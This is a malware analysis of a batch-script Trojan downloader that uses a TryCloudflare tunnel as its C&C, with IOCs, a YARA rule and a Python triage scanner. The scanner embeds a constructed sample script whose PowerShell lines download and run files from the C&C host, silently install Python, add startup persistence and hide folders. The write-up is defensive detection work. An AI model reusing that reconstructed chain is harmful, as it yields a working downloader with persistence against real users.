Important elements of the analysis:
- Trojan Downloader script
- Downloader C&C domain
- PowerShell downloading function calls
- Python downloading and silent installation
- Python scripts downloading and execution
In this article we analyze a new Trojan.BAT downloader sample. The batch script retrieves all of its payloads from a TryCloudflare quick-tunnel hostname, comparison-applied-tabs-treasure[.]trycloudflare[.]com, which acts as the downloader's C&C.
The first download is the PDF at the URL path /pdf/office365.pdf, saved as %TEMP%\office365.pdf. The script fetches it through PowerShell after forcing TLS 1.2 as the security protocol, so the request does not fail against a server that rejects older TLS versions.
Next, the Python 3.12.5 installer is downloaded from the same C&C host and installed silently with the current user's rights. A per-user Python install needs no elevation, so the whole chain runs from a standard user account.
The Python scripts xw.py, ap.py and vr.py are then downloaded from the C&C domain, saved into the Python installation directory and executed. A further script, update.cmd, is downloaded from the same domain and set to run at OS startup, giving the infection persistence across reboots.
Finally, the script hides the Python installation folder so the dropped interpreter and scripts are not visible in a default Explorer view.
At the time of analysis the C&C domain was offline. This is expected for TryCloudflare quick tunnels: the hostname is randomly generated and only resolves while the operator's cloudflared tunnel is running, so the domain itself is a short-lived indicator.
The script is flagged as malicious by OSINT sources, which label it TrojanDownloader/BAT.Agent.fb.
In summary, the malware abuses the TryCloudflare service to host and deliver its artifacts to the downloader script, placing the delivery behind a trusted domain with a valid certificate. Defenders with no business use for quick tunnels can treat outbound connections to *.trycloudflare.com as suspicious, and should hunt for PowerShell downloads followed by a user-level Python installation and a hidden Python installation directory.
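The chain described above (TryCloudflare host, PowerShell download with TLS 1.2 forced, silent per-user Python install, startup persistence, hidden install folder) lends itself to a simple static triage check on suspicious .bat/.cmd files. The following is an added example written for this article, not code from the original analysis or from the malware: it scans a batch script for each behaviour and reports which ones co-occur. The embedded batch text is a constructed sample that imitates the described behaviour; the exact installer flags (/quiet InstallAllUsers=0), the Startup-folder path and the attrib +h command are assumptions, since the original script's commands are not reproduced here.

```python
import re
from dataclasses import dataclass

# Constructed sample imitating the behaviour described in the write-up.
# It is NOT the original script; flags and paths below are assumptions.
SAMPLE_SCRIPT = r"""@echo off
set URL=https://comparison-applied-tabs-treasure.trycloudflare.com
powershell -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest '%URL%/pdf/office365.pdf' -OutFile '%TEMP%\office365.pdf'"
start "" "%TEMP%\office365.pdf"
powershell -Command "Invoke-WebRequest '%URL%/python-3.12.5-amd64.exe' -OutFile '%TEMP%\python-3.12.5-amd64.exe'"
"%TEMP%\python-3.12.5-amd64.exe" /quiet InstallAllUsers=0 PrependPath=0
set PYDIR=%LOCALAPPDATA%\Programs\Python\Python312
powershell -Command "Invoke-WebRequest '%URL%/xw.py' -OutFile '%PYDIR%\xw.py'"
powershell -Command "Invoke-WebRequest '%URL%/ap.py' -OutFile '%PYDIR%\ap.py'"
powershell -Command "Invoke-WebRequest '%URL%/vr.py' -OutFile '%PYDIR%\vr.py'"
powershell -Command "Invoke-WebRequest '%URL%/update.cmd' -OutFile '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.cmd'"
attrib +h "%PYDIR%"
"""

# One heuristic per behaviour. cmd.exe and PowerShell are case-insensitive,
# so every pattern is compiled with re.I.
HEURISTICS = [
    ("trycloudflare_host", re.compile(r"\b[a-z0-9-]+\.trycloudflare\.com\b", re.I)),
    ("ps_force_tls12", re.compile(r"SecurityProtocol.*Tls12", re.I)),
    ("ps_download", re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Net\.WebClient|Start-BitsTransfer", re.I)),
    # Python installer invoked with silent / per-user switches.
    ("python_silent_install", re.compile(
        r"python-3\.\d+\.\d+\S*\.exe.*(?:/quiet|/passive|InstallAllUsers=)", re.I)),
    # Startup folder drop, Run key, or scheduled task.
    ("startup_persistence", re.compile(
        r"\\Startup\\|CurrentVersion\\Run\b|schtasks\s+/create", re.I)),
    ("hide_directory", re.compile(r"\battrib\b.*\+h", re.I)),
]

HOST_RE = re.compile(r"\b[a-z0-9-]+\.trycloudflare\.com\b", re.I)


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based line in the scanned script
    label: str     # heuristic name from HEURISTICS
    evidence: str  # the offending line, trimmed for reporting


def scan_batch(text: str) -> list[Finding]:
    """Run every heuristic over every line and collect the hits."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        for label, rx in HEURISTICS:
            if rx.search(line):
                findings.append(Finding(n, label, line.strip()[:120]))
    return findings


def triggered_labels(findings: list[Finding]) -> list[str]:
    """Distinct heuristic names that fired, sorted for stable comparison."""
    return sorted({f.label for f in findings})


def is_downloader_chain(findings: list[Finding]) -> bool:
    """Verdict: a download primitive plus a quick-tunnel host plus at least one
    post-download action (install, persistence or hiding). A lone 'attrib +h'
    or a lone trycloudflare reference is not enough on its own."""
    labels = set(triggered_labels(findings))
    return ("ps_download" in labels
            and "trycloudflare_host" in labels
            and bool(labels & {"python_silent_install", "startup_persistence", "hide_directory"}))


def extract_tunnel_hosts(text: str) -> list[str]:
    """Pull out every *.trycloudflare.com hostname as a network IOC."""
    return sorted({m.group(0).lower() for m in HOST_RE.finditer(text)})


def defang(host: str) -> str:
    """Render a hostname as host[.]tld so it cannot be clicked in a report."""
    return host.replace(".", "[.]")


if __name__ == "__main__":
    hits = scan_batch(SAMPLE_SCRIPT)
    for f in hits:
        print(f"line {f.line_no:>2} {f.label:<22} {f.evidence}")
    print("verdict:", "downloader chain" if is_downloader_chain(hits) else "no verdict")
    print("hosts:", ", ".join(defang(h) for h in extract_tunnel_hosts(SAMPLE_SCRIPT)))
```

Run against the constructed sample, all six heuristics fire and the verdict is positive; against a script that only touches one of the behaviours (for example a legitimate installer that runs attrib +h) the verdict stays negative. In a real triage pipeline the verdict should be treated as a hunting lead, not a conviction: operators can trivially change installer flags or the persistence mechanism, while the combination of a quick-tunnel host plus a PowerShell download is the most stable signal here.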
IOCs:
- b1b9ab4c00a571dbd60efb68a9cc580615a5f645018683708c1c713774186e77 (SHA-256)
- 7b5c426d621f2127cdca95e009b10481cc9f47c0 (SHA-1)
- 1b599093750d55ebb9839260bd3d78b9 (MD5)
- comparison-applied-tabs-treasure[.]trycloudflare[.]com
- xw.py
- ap.py
- vr.py
YARA Rule (the rule keys on the tunnel hostname label, which is unique to this sample, so it detects this campaign rather than the downloader family in general; note also that $hex is simply the ASCII encoding of $str, so either string alone gives the same coverage):
rule TrojanBAT_19072025
{
    strings:
        // tunnel hostname label as ASCII text
        $str = "comparison-applied-tabs-treasure"
        // the same bytes written out as hex
        $hex = { 63 6f 6d 70 61 72 69 73 6f 6e 2d 61 70 70 6c 69 65 64 2d 74 61 62 73 2d 74 72 65 61 73 75 72 65 }
    condition:
        $str or $hex
}